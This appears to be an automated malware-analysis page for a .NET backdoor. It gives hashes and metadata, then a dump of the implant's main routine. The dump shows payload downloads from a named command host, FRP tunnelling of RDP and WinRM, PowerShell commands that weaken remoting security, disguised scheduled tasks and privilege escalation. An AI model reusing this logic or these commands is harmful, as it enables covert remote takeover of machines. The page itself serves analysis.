0601dcd79460a89d567f307c47b39c51
PE Executable | MD5: 0601dcd79460a89d567f307c47b39c51 | Size: 26.62 KB | application/x-dosexec
Symbol Obfuscation Score
|
Hash | Hash Value |
|---|---|
| MD5 | 0601dcd79460a89d567f307c47b39c51
|
| Sha1 | 52d84c47581a86d5b2e37224b4a2f0d8a7dfadfb
|
| Sha256 | f3c442a5cf38c571cb5e9d306ba03112c6f2169d4ea96e4b7c72496b26acb7fc
|
| Sha384 | 0f7ce2144a42877115cc91158dfd1a8552917e88bd7ca9d4049eee0e6eb368611497f6319f8fac9a01a3b57000dfeb59
|
| Sha512 | f5d294d1d5cf2064037414281b5875005e2cbdc4ee4e69e149e4f78494acd22f8c2a2e5b0c28ff640807feb5b9df4f1ea82b245c8ab65f3ed715dd6e8528e1a9
|
| SSDeep | 384:PyqJ4NAf/BQE4uCbMojKCRDP2E4/4BejOWUa3yffKmagZZjDEDtOXD8wcwS49:qsf5NCbMo75P2JpyscdjDEDtOXD8w
|
| TLSH | 7EC24F04ABFC0518F2FB5F355ABA29504977BC9A2A75CA4D2D42409E0DB1BD0DEA0F37
|
PeID
|
Name0 | Value |
|---|---|
| Info | PE Detect: PeReader OK (file layout) |
| Module Name | js5ey5gh.v3i.exe |
| Full Name | js5ey5gh.v3i.exe |
| EntryPoint | System.Void StandaloneProgram.Program::Main() |
| Scope Name | js5ey5gh.v3i.exe |
| Scope Type | ModuleDef |
| Kind | Windows |
| Runtime Version | v2.0.50727 |
| Tables Header Version | 512 |
| WinMD Version | <null> |
| Assembly Name | js5ey5gh.v3i |
| Assembly Version | 0.0.0.0 |
| Assembly Culture | <null> |
| Has PublicKey | False |
| PublicKey Token | <null> |
| Target Framework | <null> |
| Total Strings | 245 |
| Main Method | System.Void StandaloneProgram.Program::Main() |
| Main IL Instruction Count | 1331 |
| Main IL | ldnull <null> stloc.0 <null> call System.Int32 StandaloneProgram.Program::DetermineIntegrity() stsfld System.Int32 StandaloneProgram.Program::integrity ldsfld System.Int32 StandaloneProgram.Program::integrity ldc.i4.4 <null> bne.un.s IL_001E: ldsfld System.Int32 StandaloneProgram.Program::integrity ldc.i4 20000 call System.Void System.Threading.Thread::Sleep(System.Int32) ldsfld System.Int32 StandaloneProgram.Program::integrity ldc.i4.3 <null> blt.s IL_0050: ldstr "C:\\AdsPower" ldsfld System.Int32 StandaloneProgram.Program::integrity ldc.i4.4 <null> beq.s IL_0035: ldstr "Global\\SystemStagerMutex" ldstr Global\AdminStagerMutex br.s IL_003A: stloc.s V_10 ldstr Global\SystemStagerMutex stloc.s V_10 ldc.i4.1 <null> ldloc.s V_10 ldloca.s V_11 newobj System.Void System.Threading.Mutex::.ctor(System.Boolean,System.String,System.Boolean&) stloc.0 <null> ldloc.s V_11 brtrue.s IL_0050: ldstr "C:\\AdsPower" leave IL_0F94: ret ldstr C:\AdsPower dup <null> call System.IO.DirectoryInfo System.IO.Directory::CreateDirectory(System.String) pop <null> ldstr proxy_error{0}.txt ldsfld System.Int32 StandaloneProgram.Program::integrity box System.Int32 call System.String System.String::Format(System.String,System.Object) call System.String System.IO.Path::Combine(System.String,System.String) stsfld System.String StandaloneProgram.Program::logFile ldstr Determined integrity level: {0} (4=SYSTEM,3=Admin,2=User) ldsfld System.Int32 StandaloneProgram.Program::integrity box System.Int32 call System.String System.String::Format(System.String,System.Object) ldc.i4.1 <null> call System.Void StandaloneProgram.Program::Log(System.String,System.Int32) ldstr http://khkjhjkhjkhjkhkjkj.com:81 stloc.1 <null> ldloc.1 <null> ldc.i4.1 <null> newarr System.Char dup <null> ldc.i4.0 <null> ldc.i4.s 44 stelem.i2 <null> callvirt System.String[] System.String::Split(System.Char[]) ldc.i4.0 <null> ldelem.ref <null> ldstr http:// ldstr callvirt System.String System.String::Replace(System.String,System.String) ldstr https:// ldstr callvirt System.String System.String::Replace(System.String,System.String) ldc.i4.1 <null> newarr System.Char dup <null> ldc.i4.0 <null> ldc.i4.s 47 stelem.i2 <null> callvirt System.String[] System.String::Split(System.Char[]) ldc.i4.0 <null> ldelem.ref <null> ldc.i4.1 <null> newarr System.Char dup <null> ldc.i4.0 <null> ldc.i4.s 58 stelem.i2 <null> callvirt System.String[] System.String::Split(System.Char[]) ldc.i4.0 <null> ldelem.ref <null> stloc.2 <null> ldloc.1 <null> ldc.i4.1 <null> newarr System.Char dup <null> ldc.i4.0 <null> ldc.i4.s 44 stelem.i2 <null> callvirt System.String[] System.String::Split(System.Char[]) ldc.i4.0 <null> ldelem.ref <null> ldstr /hosted/RDPWrapper.exe call System.String System.String::Concat(System.String,System.String) stloc.3 <null> ldloc.1 <null> ldc.i4.1 <null> newarr System.Char dup <null> ldc.i4.0 <null> ldc.i4.s 44 stelem.i2 <null> callvirt System.String[] System.String::Split(System.Char[]) ldc.i4.0 <null> ldelem.ref <null> ldstr /hosted/FRPWrapper.exe call System.String System.String::Concat(System.String,System.String) stloc.s V_4 ldloc.2 <null> ldc.i4 7000 call System.String StandaloneProgram.Program::SelectServerIP(System.String,System.Int32) stloc.s V_5 ldstr Selected server IP: ldloc.s V_5 call System.String System.String::Concat(System.String,System.String) ldc.i4.1 <null> call System.Void StandaloneProgram.Program::Log(System.String,System.Int32) ldloc.1 <null> ldc.i4.1 <null> newarr System.Char dup <null> ldc.i4.0 <null> ldc.i4.s 44 stelem.i2 <null> callvirt System.String[] System.String::Split(System.Char[]) ldc.i4.0 <null> ldelem.ref <null> newobj System.Void System.Uri::.ctor(System.String) stloc.s V_6 ldloc.s V_5 stloc.s V_7 ldloc.s V_6 callvirt System.Int32 System.Uri::get_Port() ldloc.s V_6 callvirt System.String System.Uri::get_Scheme() ldstr https call System.Boolean System.String::op_Equality(System.String,System.String) brtrue.s IL_0188: ldc.i4 443 ldc.i4.s 80 br.s IL_018D: beq.s IL_01AD ldc.i4 443 beq.s IL_01AD: ldloc.s V_6 ldloc.s V_7 ldstr : ldloc.s V_6 callvirt System.Int32 System.Uri::get_Port() stloc.s V_13 ldloca.s V_13 call System.String System.Int32::ToString() call System.String System.String::Concat(System.String,System.String,System.String) stloc.s V_7 ldloc.s V_6 callvirt System.String System.Uri::get_Scheme() ldstr :// ldloc.s V_7 ldloc.s V_6 callvirt System.String System.Uri::get_AbsolutePath() ldc.i4.1 <null> newarr System.Char dup <null> ldc.i4.0 <null> ldc.i4.s 47 stelem.i2 <null> callvirt System.String System.String::TrimEnd(System.Char[]) call System.String System.String::Concat(System.String,System.String,System.String,System.String) dup <null> ldstr /hosted/RDPWrapper.exe call System.String System.String::Concat(System.String,System.String) stloc.3 <null> ldstr /hosted/FRPWrapper.exe call System.String System.String::Concat(System.String,System.String) stloc.s V_4 ldc.i4.0 <null> stloc.s V_8 ldsfld Microsoft.Win32.RegistryKey Microsoft.Win32.Registry::LocalMachine ldstr Software\Microsoft\Windows\CurrentVersion\Explorer ldc.i4.0 <null> callvirt Microsoft.Win32.RegistryKey Microsoft.Win32.RegistryKey::OpenSubKey(System.String,System.Boolean) stloc.s V_14 ldloc.s V_14 brfalse.s IL_0224: leave.s IL_0232 ldloc.s V_14 ldstr IconSizeVersion1 callvirt System.Object Microsoft.Win32.RegistryKey::GetValue(System.String) brfalse.s IL_0224: leave.s IL_0232 ldc.i4.1 <null> stloc.s V_8 ldstr RDPWrapper already exists in HKLM, skipping download ldc.i4.1 <null> call System.Void StandaloneProgram.Program::Log(System.String,System.Int32) leave.s IL_0232: ldloc.s V_8 ldloc.s V_14 brfalse.s IL_0231: endfinally ldloc.s V_14 callvirt System.Void System.IDisposable::Dispose() endfinally <null> ldloc.s V_8 brtrue.s IL_0292: ldc.i4.0 ldstr Downloading RDPWrapper... ldc.i4.1 <null> call System.Void StandaloneProgram.Program::Log(System.String,System.Int32) ldloc.3 <null> call System.Byte[] StandaloneProgram.Program::DownloadBinary(System.String) stloc.s V_15 ldloc.s V_15 brfalse.s IL_0287: ldstr "Failed to download RDPWrapper" ldsfld Microsoft.Win32.RegistryKey Microsoft.Win32.Registry::CurrentUser ldstr SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer ldc.i4.2 <null> callvirt Microsoft.Win32.RegistryKey Microsoft.Win32.RegistryKey::CreateSubKey(System.String,Microsoft.Win32.RegistryKeyPermissionCheck) stloc.s V_16 ldloc.s V_16 ldstr IconSizeVersion1 ldloc.s V_15 ldc.i4.3 <null> callvirt System.Void Microsoft.Win32.RegistryKey::SetValue(System.String,System.Object,Microsoft.Win32.RegistryValueKind) ldstr RDPWrapper downloaded to HKCU ldc.i4.1 <null> call System.Void StandaloneProgram.Program::Log(System.String,System.Int32) leave.s IL_0292: ldc.i4.0 ldloc.s V_16 brfalse.s IL_0286: endfinally ldloc.s V_16 callvirt System.Void System.IDisposable::Dispose() endfinally <null> ldstr Failed to download RDPWrapper ldc.i4.1 <null> call System.Void StandaloneProgram.Program::Log(System.String,System.Int32) ldc.i4.0 <null> stloc.s V_9 ldsfld Microsoft.Win32.RegistryKey Microsoft.Win32.Registry::LocalMachine ldstr Software\Microsoft\Windows\CurrentVersion\Explorer ldc.i4.0 <null> callvirt Microsoft.Win32.RegistryKey Microsoft.Win32.RegistryKey::OpenSubKey(System.String,System.Boolean) stloc.s V_17 ldloc.s V_17 brfalse.s IL_02C7: leave.s IL_02D5 ldloc.s V_17 ldstr IconUnderlineVersion1 callvirt System.Object Microsoft.Win32.RegistryKey::GetValue(System.String) brfalse.s IL_02C7: leave.s IL_02D5 ldc.i4.1 <null> stloc.s V_9 ldstr FRP binary already exists in HKLM, skipping download ldc.i4.1 <null> call System.Void StandaloneProgram.Program::Log(System.String,System.Int32) leave.s IL_02D5: ldloc.s V_9 ldloc.s V_17 brfalse.s IL_02D4: endfinally ldloc.s V_17 callvirt System.Void System.IDisposable::Dispose() endfinally <null> ldloc.s V_9 brtrue.s IL_0336: ldsfld System.Int32 StandaloneProgram.Program::integrity ldstr Downloading FRP binary... ldc.i4.1 <null> call System.Void StandaloneProgram.Program::Log(System.String,System.Int32) ldloc.s V_4 call System.Byte[] StandaloneProgram.Program::DownloadBinary(System.String) stloc.s V_18 ldloc.s V_18 brfalse.s IL_032B: ldstr "Failed to download FRP binary" ldsfld Microsoft.Win32.RegistryKey Microsoft.Win32.Registry::CurrentUser ldstr SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer ldc.i4.2 <null> callvirt Microsoft.Win32.RegistryKey Microsoft.Win32.RegistryKey::CreateSubKey(System.String,Microsoft.Win32.RegistryKeyPermissionCheck) stloc.s V_19 ldloc.s V_19 ldstr IconUnderlineVersion1 ldloc.s V_18 ldc.i4.3 <null> callvirt System.Void Microsoft.Win32.RegistryKey::SetValue(System.String,System.Object,Microsoft.Win32.RegistryValueKind) ldstr FRP binary downloaded to HKCU ldc.i4.1 <null> call System.Void StandaloneProgram.Program::Log(System.String,System.Int32) leave.s IL_0336: ldsfld System.Int32 StandaloneProgram.Program::integrity ldloc.s V_19 brfalse.s IL_032A: endfinally ldloc.s V_19 callvirt System.Void System.IDisposable::Dispose() endfinally <null> ldstr Failed to download FRP binary ldc.i4.1 <null> call System.Void StandaloneProgram.Program::Log(System.String,System.Int32) ldsfld System.Int32 StandaloneProgram.Program::integrity ldc.i4.2 <null> bne.un.s IL_0383: ldsfld System.Int32 StandaloneProgram.Program::integrity ldstr Not admin/system, escalating privileges... ldc.i4.1 <null> call System.Void StandaloneProgram.Program::Log(System.String,System.Int32) ldc.i4.0 <null> ldstr ShellStateVersion1 call System.String StandaloneProgram.Program::GetPowershellCommand(System.Boolean,System.String) call System.Diagnostics.Process StandaloneProgram.Program::RunAsAdmin(System.String) pop <null> ldstr Escalation attempted ldc.i4.1 <null> call System.Void StandaloneProgram.Program::Log(System.String,System.Int32) leave IL_0F94: ret stloc.s V_20 ldstr Error in escalation: {0} ldloc.s V_20 call System.String System.String::Format(System.String,System.Object) ldc.i4.1 <null> call System.Void StandaloneProgram.Program::Log(System.String,System.Int32) leave IL_0F94: ret ldsfld System.Int32 StandaloneProgram.Program::integrity ldc.i4.3 <null> blt IL_0558: ldsfld System.Int32 StandaloneProgram.Program::integrity ldsfld Microsoft.Win32.RegistryKey Microsoft.Win32.Registry::CurrentUser ldstr Software\Microsoft\Windows\CurrentVersion\Explorer ldc.i4.1 <null> callvirt Microsoft.Win32.RegistryKey Microsoft.Win32.RegistryKey::OpenSubKey(System.String,System.Boolean) stloc.s V_21 ldloc.s V_21 brfalse.s IL_0400: leave.s IL_040E ldloc.s V_21 ldstr ShellStateVersion1 callvirt System.Object Microsoft.Win32.RegistryKey::GetValue(System.String) stloc.s V_22 ldloc.s V_22 brfalse.s IL_0400: leave.s IL_040E ldsfld Microsoft.Win32.RegistryKey Microsoft.Win32.Registry::LocalMachine ldstr Software\Microsoft\Windows\CurrentVersion\Explorer ldc.i4.1 <null> callvirt Microsoft.Win32.RegistryKey Microsoft.Win32.RegistryKey::OpenSubKey(System.String,System.Boolean) stloc.s V_23 ldloc.s V_23 brfalse.s IL_03F2: leave.s IL_0400 ldloc.s V_23 ldstr ShellStateVersion1 ldloc.s V_22 ldc.i4.3 <null> callvirt System.Void Microsoft.Win32.RegistryKey::SetValue(System.String,System.Object,Microsoft.Win32.RegistryValueKind) ldloc.s V_21 ldstr ShellStateVersion1 callvirt System.Void Microsoft.Win32.RegistryKey::DeleteValue(System.String) ldstr Moved implant data to HKLM ldc.i4.1 <null> call System.Void StandaloneProgram.Program::Log(System.String,System.Int32) leave.s IL_0400: leave.s IL_040E ldloc.s V_23 brfalse.s IL_03FF: endfinally ldloc.s V_23 callvirt System.Void System.IDisposable::Dispose() endfinally <null> leave.s IL_040E: leave.s IL_0426 ldloc.s V_21 brfalse.s IL_040D: endfinally ldloc.s V_21 callvirt System.Void System.IDisposable::Dispose() endfinally <null> leave.s IL_0426: nop stloc.s V_24 ldstr Error moving registry data: {0} ldloc.s V_24 call System.String System.String::Format(System.String,System.Object) ldc.i4.1 <null> call System.Void StandaloneProgram.Program::Log(System.String,System.Int32) leave.s IL_0426: nop nop <null> ldsfld Microsoft.Win32.RegistryKey Microsoft.Win32.Registry::CurrentUser ldstr Software\Microsoft\Windows\CurrentVersion\Explorer ldc.i4.1 <null> callvirt Microsoft.Win32.RegistryKey Microsoft.Win32.RegistryKey::OpenSubKey(System.String,System.Boolean) stloc.s V_25 ldloc.s V_25 brfalse.s IL_0499: leave.s IL_04A7 ldloc.s V_25 ldstr IconSizeVersion1 callvirt System.Object Microsoft.Win32.RegistryKey::GetValue(System.String) stloc.s V_26 ldloc.s V_26 brfalse.s IL_0499: leave.s IL_04A7 ldsfld Microsoft.Win32.RegistryKey Microsoft.Win32.Registry::LocalMachine ldstr Software\Microsoft\Windows\CurrentVersion\Explorer ldc.i4.1 <null> callvirt Microsoft.Win32.RegistryKey Microsoft.Win32.RegistryKey::OpenSubKey(System.String,System.Boolean) stloc.s V_27 ldloc.s V_27 brfalse.s IL_048B: leave.s IL_0499 ldloc.s V_27 ldstr IconSizeVersion1 ldloc.s V_26 ldc.i4.3 <null> callvirt System.Void Microsoft.Win32.RegistryKey::SetValue(System.String,System.Object,Microsoft.Win32.RegistryValueKind) ldloc.s V_25 ldstr IconSizeVersion1 callvirt System.Void Microsoft.Win32.RegistryKey::DeleteValue(System.String) ldstr Moved RDPWrapper data to HKLM ldc.i4.1 <null> call System.Void StandaloneProgram.Program::Log(System.String,System.Int32) leave.s IL_0499: leave.s IL_04A7 ldloc.s V_27 brfalse.s IL_0498: endfinally ldloc.s V_27 callvirt System.Void System.IDisposable::Dispose() endfinally <null> leave.s IL_04A7: leave.s IL_04BF ldloc.s V_25 brfalse.s IL_04A6: endfinally ldloc.s V_25 callvirt System.Void System.IDisposable::Dispose() endfinally <null> leave.s IL_04BF: nop stloc.s V_28 ldstr Error moving RDPWrapper data: {0} ldloc.s V_28 call System.String System.String::Format(System.String,System.Object) ldc.i4.1 <null> call System.Void StandaloneProgram.Program::Log(System.String,System.Int32) leave.s IL_04BF: nop nop <null> ldsfld Microsoft.Win32.RegistryKey Microsoft.Win32.Registry::CurrentUser ldstr Software\Microsoft\Windows\CurrentVersion\Explorer ldc.i4.1 <null> callvirt Microsoft.Win32.RegistryKey Microsoft.Win32.RegistryKey::OpenSubKey(System.String,System.Boolean) stloc.s V_29 ldloc.s V_29 brfalse.s IL_0532: leave.s IL_0540 ldloc.s V_29 ldstr IconUnderlineVersion1 callvirt System.Object Microsoft.Win32.RegistryKey::GetValue(System.String) stloc.s V_30 ldloc.s V_30 brfalse.s IL_0532: leave.s IL_0540 ldsfld Microsoft.Win32.RegistryKey Microsoft.Win32.Registry::LocalMachine ldstr Software\Microsoft\Windows\CurrentVersion\Explorer ldc.i4.1 <null> callvirt Microsoft.Win32.RegistryKey Microsoft.Win32.RegistryKey::OpenSubKey(System.String,System.Boolean) stloc.s V_31 ldloc.s V_31 brfalse.s IL_0524: leave.s IL_0532 ldloc.s V_31 ldstr IconUnderlineVersion1 ldloc.s V_30 ldc.i4.3 <null> callvirt System.Void Microsoft.Win32.RegistryKey::SetValue(System.String,System.Object,Microsoft.Win32.RegistryValueKind) ldloc.s V_29 ldstr IconUnderlineVersion1 callvirt System.Void Microsoft.Win32.RegistryKey::DeleteValue(System.String) ldstr Moved FRP data to HKLM ldc.i4.1 <null> call System.Void StandaloneProgram.Program::Log(System.String,System.Int32) leave.s IL_0532: leave.s IL_0540 ldloc.s V_31 brfalse.s IL_0531: endfinally ldloc.s V_31 callvirt System.Void System.IDisposable::Dispose() endfinally <null> leave.s IL_0540: leave.s IL_0558 ldloc.s V_29 brfalse.s IL_053F: endfinally ldloc.s V_29 callvirt System.Void System.IDisposable::Dispose() endfinally <null> leave.s IL_0558: ldsfld System.Int32 StandaloneProgram.Program::integrity stloc.s V_32 ldstr Error moving FRP data: {0} ldloc.s V_32 call System.String System.String::Format(System.String,System.Object) ldc.i4.1 <null> call System.Void StandaloneProgram.Program::Log(System.String,System.Int32) leave.s IL_0558: ldsfld System.Int32 StandaloneProgram.Program::integrity ldsfld System.Int32 StandaloneProgram.Program::integrity ldc.i4.3 <null> blt IL_06C8: ldsfld System.Int32 StandaloneProgram.Program::integrity ldstr C:\ProgramData\frp stloc.s V_33 ldloc.s V_33 ldstr frpc.toml call System.String System.IO.Path::Combine(System.String,System.String) stloc.s V_34 ldloc.s V_33 call System.Boolean System.IO.Directory::Exists(System.String) brtrue.s IL_05A8: ldloc.s V_34 ldloc.s V_33 call System.IO.DirectoryInfo System.IO.Directory::CreateDirectory(System.String) pop <null> ldloc.s V_33 newobj System.Void System.IO.DirectoryInfo::.ctor(System.String) dup <null> callvirt System.IO.FileAttributes System.IO.FileSystemInfo::get_Attributes() ldc.i4.2 <null> or <null> callvirt System.Void System.IO.FileSystemInfo::set_Attributes(System.IO.FileAttributes) ldstr FRP directory created and hidden ldc.i4.1 <null> call System.Void StandaloneProgram.Program::Log(System.String,System.Int32) ldloc.s V_34 call System.Boolean System.IO.File::Exists(System.String) brtrue.s IL_05F0: ldloc.s V_34 ldc.i4.5 <null> newarr System.String dup <null> ldc.i4.0 <null> ldstr serverAddr = " stelem.ref <null> dup <null> ldc.i4.1 <null> ldloc.s V_5 stelem.ref <null> dup <null> ldc.i4.2 <null> ldstr " serverPort = 7000 loginFailExit = false auth = { method = "token", token = "ADAD" } user = " stelem.ref <null> dup <null> ldc.i4.3 <null> call System.String System.Environment::get_UserName() stelem.ref <null> dup <null> ldc.i4.4 <null> ldstr " [[proxies]] name = "rdp" type = "tcp" localIP = "127.0.0.1" localPort = 3389 remotePort = 0 [[proxies]] name = "winrm" type = "tcp" localIP = "127.0.0.1" localPort = 5985 remotePort = 0 stelem.ref <null> call System.String System.String::Concat(System.String[]) stloc.s V_35 ldstr FRP config created ldc.i4.1 <null> call System.Void StandaloneProgram.Program::Log(System.String,System.Int32) br.s IL_0627: ldloc.s V_34 ldloc.s V_34 call System.String System.IO.File::ReadAllText(System.String) ldstr serverAddr = " ldloc.s V_5 ldstr " call System.String System.String::Concat(System.String,System.String,System.String) stloc.s V_36 ldstr serverAddr\s*=\s*"[^"]*" stloc.s V_37 ldloc.s V_37 ldloc.s V_36 call System.String System.Text.RegularExpressions.Regex::Replace(System.String,System.String,System.String) stloc.s V_35 ldstr FRP config updated (IP only) ldc.i4.1 <null> call System.Void StandaloneProgram.Program::Log(System.String,System.Int32) ldloc.s V_34 ldloc.s V_35 callvirt System.String System.String::Trim() call System.Void System.IO.File::WriteAllText(System.String,System.String) ldstr powershell ldstr -Command "Enable-PSRemoting -Force; Set-Item WSMan:\localhost\Client\TrustedHosts -Value '*' -Force; New-ItemProperty -Path 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System' -Name 'LocalAccountTokenFilterPolicy' -Value 1 -PropertyType DWORD -Force; Restart-Service winrm" newobj System.Void System.Diagnostics.ProcessStartInfo::.ctor(System.String,System.String) dup <null> ldc.i4.1 <null> callvirt System.Void System.Diagnostics.ProcessStartInfo::set_CreateNoWindow(System.Boolean) dup <null> ldc.i4.0 <null> callvirt System.Void System.Diagnostics.ProcessStartInfo::set_UseShellExecute(System.Boolean) dup <null> ldc.i4.1 <null> callvirt System.Void System.Diagnostics.ProcessStartInfo::set_RedirectStandardOutput(System.Boolean) dup <null> ldc.i4.1 <null> callvirt System.Void System.Diagnostics.ProcessStartInfo::set_RedirectStandardError(System.Boolean) call System.Diagnostics.Process System.Diagnostics.Process::Start(System.Diagnostics.ProcessStartInfo) stloc.s V_38 ldloc.s V_38 callvirt System.Void System.Diagnostics.Process::WaitForExit() ldstr WinRM configuration exit code: {0} ldloc.s V_38 callvirt System.Int32 System.Diagnostics.Process::get_ExitCode() box System.Int32 call System.String System.String::Format(System.String,System.Object) ldc.i4.1 <null> call System.Void StandaloneProgram.Program::Log(System.String,System.Int32) leave.s IL_0698: leave.s IL_06B0 ldloc.s V_38 brfalse.s IL_0697: endfinally ldloc.s V_38 callvirt System.Void System.IDisposable::Dispose() endfinally <null> leave.s IL_06B0: leave.s IL_06C8 stloc.s V_39 ldstr Error configuring WinRM: {0} ldloc.s V_39 call System.String System.String::Format(System.String,System.Object) ldc.i4.1 <null> call System.Void StandaloneProgram.Program::Log(System.String,System.Int32) leave.s IL_06B0: leave.s IL_06C8 leave.s IL_06C8: ldsfld System.Int32 StandaloneProgram.Program::integrity stloc.s V_40 ldstr Error setting up FRP tunnel: {0} ldloc.s V_40 call System.String System.String::Format(System.String,System.Object) ldc.i4.1 <null> call System.Void StandaloneProgram.Program::Log(System.String,System.Int32) leave.s IL_06C8: ldsfld System.Int32 StandaloneProgram.Program::integrity ldsfld System.Int32 StandaloneProgram.Program::integrity ldc.i4.3 <null> bne.un IL_0764: ldsfld System.Int32 StandaloneProgram.Program::integrity ldstr Admin detected, creating service... ldc.i4.1 <null> call System.Void StandaloneProgram.Program::Log(System.String,System.Int32) ldc.i4.1 <null> ldstr ShellStateVersion1 call System.String StandaloneProgram.Program::GetPowershellCommand(System.Boolean,System.String) stloc.s V_41 ldstr DriverSvcTask ldstr Driver Support Service ldloc.s V_41 ldc.i4.0 <null> call System.Void StandaloneProgram.Program::CreateTask(System.String,System.String,System.String,System.Boolean) ldstr powershell.exe sleep 30; ldc.i4.1 <null> ldstr IconUnderlineVersion1 call System.String StandaloneProgram.Program::GetPowershellCommand(System.Boolean,System.String) ldstr " call System.String System.String::Concat(System.String,System.String,System.String) stloc.s V_42 ldstr NetTcpSvc ldstr Manages network TCP connections for system services. ldloc.s V_42 ldc.i4.1 <null> call System.Void StandaloneProgram.Program::CreateTask(System.String,System.String,System.String,System.Boolean) ldstr TermSvcHost ldstr Provides support for Terminal Services. ldc.i4.1 <null> ldstr IconSizeVersion1 call System.String StandaloneProgram.Program::GetPowershellCommand(System.Boolean,System.String) ldc.i4.1 <null> call System.Void StandaloneProgram.Program::CreateTask(System.String,System.String,System.String,System.Boolean) leave IL_07F5: nop stloc.s V_43 ldstr Error setting up autorun and task: {0} ldloc.s V_43 call System.String System.String::Format(System.String,System.Object) ldc.i4.1 <null> call System.Void StandaloneProgram.Program::Log(System.String,System.Int32) leave IL_07F5: nop ldsfld System.Int32 StandaloneProgram.Program::integrity ldc.i4.4 <null> bne.un IL_07F5: nop ldstr System detected, ensuring tasks exist... ldc.i4.1 <null> call System.Void StandaloneProgram.Program::Log(System.String,System.Int32) ldc.i4.1 <null> ldstr ShellStateVersion1 call System.String StandaloneProgram.Program::GetPowershellCommand(System.Boolean,System.String) stloc.s V_44 ldstr DriverSvcTask ldstr Driver Support Service ldloc.s V_44 ldc.i4.0 <null> call System.Void StandaloneProgram.Program::CreateTask(System.String,System.String,System.String,System.Boolean) ldstr powershell.exe sleep 30; ldc.i4.1 <null> ldstr IconUnderlineVersion1 call System.String StandaloneProgram.Program::GetPowershellCommand(System.Boolean,System.String) call System.String System.String::Concat(System.String,System.String) stloc.s V_45 ldstr NetTcpSvc ldstr Manages network TCP connections for system services. ldloc.s V_45 ldc.i4.0 <null> call System.Void StandaloneProgram.Program::CreateTask(System.String,System.String,System.String,System.Boolean) ldstr TermSvcHost ldstr Provides support for Terminal Services. ldc.i4.1 <null> ldstr IconSizeVersion1 call System.String StandaloneProgram.Program::GetPowershellCommand(System.Boolean,System.String) ldc.i4.0 <null> call System.Void StandaloneProgram.Program::CreateTask(System.String,System.String,System.String,System.Boolean) leave.s IL_07F5: nop stloc.s V_46 ldstr Error ensuring tasks exist: {0} ldloc.s V_46 call System.String System.String::Format(System.String,System.Object) ldc.i4.1 <null> call System.Void StandaloneProgram.Program::Log(System.String,System.Int32) leave.s IL_07F5: nop nop <null> newobj System.Void System.Collections.Generic.List`1<System.String>::.ctor() stloc.s V_47 ldsfld System.Int32 StandaloneProgram.Program::integrity ldc.i4.3 <null> bne.un.s IL_0816: ldsfld System.Int32 StandaloneProgram.Program::integrity ldloc.s V_47 call System.String System.Environment::get_UserName() callvirt System.Void System.Collections.Generic.List`1<System.String>::Add(System.String) br IL_08A1: ldc.i4.0 ldsfld System.Int32 StandaloneProgram.Program::integrity ldc.i4.4 <null> bne.un IL_08A1: ldc.i4.0 ldstr S-1-5-32-555 call System.Collections.Generic.List`1<System.String> StandaloneProgram.Program::GetLocalGroupMembers(System.String) callvirt System.Collections.Generic.List`1/Enumerator<System.String> System.Collections.Generic.List`1<System.String>::GetEnumerator() stloc.s V_51 br.s IL_0888: ldloca.s V_51 ldloca.s V_51 call System.String System.Collections.Generic.List`1/Enumerator<System.String>::get_Current() stloc.s V_52 ldloc.s V_52 stloc.s V_53 ldloc.s V_52 ldc.i4.s 92 callvirt System.Int32 System.String::LastIndexOf(System.Char) stloc.s V_54 ldloc.s V_54 ldc.i4.0 <null> blt.s IL_086B: ldloc.s V_53 ldloc.s V_54 ldc.i4.1 <null> add <null> ldloc.s V_52 callvirt System.Int32 System.String::get_Length() bge.s IL_086B: ldloc.s V_53 ldloc.s V_52 ldloc.s V_54 ldc.i4.1 <null> add <null> callvirt System.String System.String::Substring(System.Int32) stloc.s V_53 ldloc.s V_53 call System.Boolean System.String::IsNullOrEmpty(System.String) brtrue.s IL_0888: ldloca.s V_51 ldloc.s V_47 ldloc.s V_53 callvirt System.Boolean System.Collections.Generic.List`1<System.String>::Contains(System.String) brtrue.s IL_0888: ldloca.s V_51 ldloc.s V_47 ldloc.s V_53 callvirt System.Void System.Collections.Generic.List`1<System.String>::Add(System.String) ldloca.s V_51 call System.Boolean System.Collections.Generic.List`1/Enumerator<System.String>::MoveNext() brtrue.s IL_0834: ldloca.s V_51 leave.s IL_08A1: ldc.i4.0 ldloca.s V_51 constrained. System.Collections.Generic.List`1/Enumerator<System.String> callvirt System.Void System.IDisposable::Dispose() endfinally <null> ldc.i4.0 <null> call System.Void StandaloneProgram.Program::SetLimitBlankPasswordUse(System.Boolean) ldc.i4.0 <null> stloc.s V_48 ldstr SysMaintenance stloc.s V_49 ldloc.s V_47 callvirt System.Collections.Generic.List`1/Enumerator<System.String> System.Collections.Generic.List`1<System.String>::GetEnumerator() stloc.s V_51 br IL_0B7A: ldloca.s V_51 ldloca.s V_51 call System.String System.Collections.Generic.List`1/Enumerator<System.String>::get_Current() stloc.s V_55 ldstr Attempting to configure user: ldloc.s V_55 call System.String System.String::Concat(System.String,System.String) ldc.i4.1 <null> call System.Void StandaloneProgram.Program::Log(System.String,System.Int32) ldstr net ldstr user " ldloc.s V_55 ldstr " call System.String System.String::Concat(System.String,System.String,System.String) newobj System.Void System.Diagnostics.ProcessStartInfo::.ctor(System.String,System.String) dup <null> ldc.i4.1 <null> callvirt System.Void System.Diagnostics.ProcessStartInfo::set_CreateNoWindow(System.Boolean) dup <null> ldc.i4.0 <null> callvirt System.Void System.Diagnostics.ProcessStartInfo::set_UseShellExecute(System.Boolean) dup <null> ldc.i4.1 <null> callvirt System.Void System.Diagnostics.ProcessStartInfo::set_RedirectStandardOutput(System.Boolean) dup <null> ldc.i4.1 <null> callvirt System.Void System.Diagnostics.ProcessStartInfo::set_RedirectStandardError(System.Boolean) call System.Diagnostics.Process System.Diagnostics.Process::Start(System.Diagnostics.ProcessStartInfo) stloc.s V_56 ldloc.s V_56 callvirt System.IO.StreamReader System.Diagnostics.Process::get_StandardOutput() callvirt System.String System.IO.TextReader::ReadToEnd() ldloc.s V_56 callvirt System.Void System.Diagnostics.Process::WaitForExit() ldloc.s V_49 callvirt System.Boolean System.String::Contains(System.String) brfalse.s IL_0952: leave.s IL_0960 ldstr Skipping user ldloc.s V_55 ldstr due to description containing ldloc.s V_49 call System.String System.String::Concat(System.String,System.String,System.String,System.String) ldc.i4.1 <null> call System.Void StandaloneProgram.Program::Log(System.String,System.Int32) leave IL_0B7A: ldloca.s V_51 leave.s IL_0960: ldstr "net" ldloc.s 